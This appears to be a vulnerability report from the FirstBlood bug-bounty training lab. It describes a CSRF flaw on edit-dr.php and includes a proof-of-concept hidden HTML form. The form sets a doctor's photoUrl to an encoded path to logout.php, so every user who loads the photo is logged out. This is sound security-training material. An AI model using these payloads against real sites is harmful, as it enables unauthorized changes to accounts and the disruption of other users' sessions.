FirstBlood-#1422CSRF on edit-dr.php leads to admin DoS
This issue was discovered on FirstBlood v3

On 2022-12-10, agentmellow Level 3 reported:

As I returned to login.php this lead me to the logout.php and its functionality.

First I realized the POST request at edit-dr.php with a custom photoUrl= can be made, as the parameter &csrf token isnt validated; CSRF. Thus a logged in user submitting the form will update the doctor accordingly(htmlencodings will be nessisary!).

Simple POC:

  <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="drid" value="4" />
      <input type="hidden" name="name" value="Sean" />
      <input type="hidden" name="bio" value="MyBioCSRF" />
      <input type="hidden" name="bookable" value="1" />
      <input type="hidden" name="photoUrl" value="&#47;test&#46;png" />
      <input type="submit" value="Submit request" />

And while that is a fun, its even funnier to point the photoUrl to the GET logout.php via CSRF (htmlencodings will be nessisary!). Edit the form script above to:

<input type="hidden" name="photoUrl" value="&#x2f;&#x2f;firstblood&#x2f;&#x2e;&#x2e;&#x2f;drpanel&#x2f;logout&#x2e;php">

Or for brevity: photoUrl=//firstblood/../drpanel/logout.php

- This can also be done as an authenticated user, simply using the POST request as an authenticated user, point the logout.php in the image src of doctor 4 in my example:

DoS on any authenticated user logging in!:

POC with image-src loading logout.php:

One can also try to login with the default credentials, but will be logged out instantly.

P4 Low

This report contains multiple vulnerabilities:

  • Application/Business Logic
  • Cross Site Request Forgery

FirstBlood ID: 61
Vulnerability Type: Application/Business Logic

It mentions that doctor photos can NOT be modified but it is actually possible to modify them

FirstBlood ID: 58
Vulnerability Type: Cross Site Request Forgery

There is a CSRF vulnerability on /drpanel/edit-dr.php via a GET request and lack of token validation. It was intended that a POST request does not work due to no cookies sent on the request (because of SameSite), but to an over sight this cookie was overwritten rendering it useless.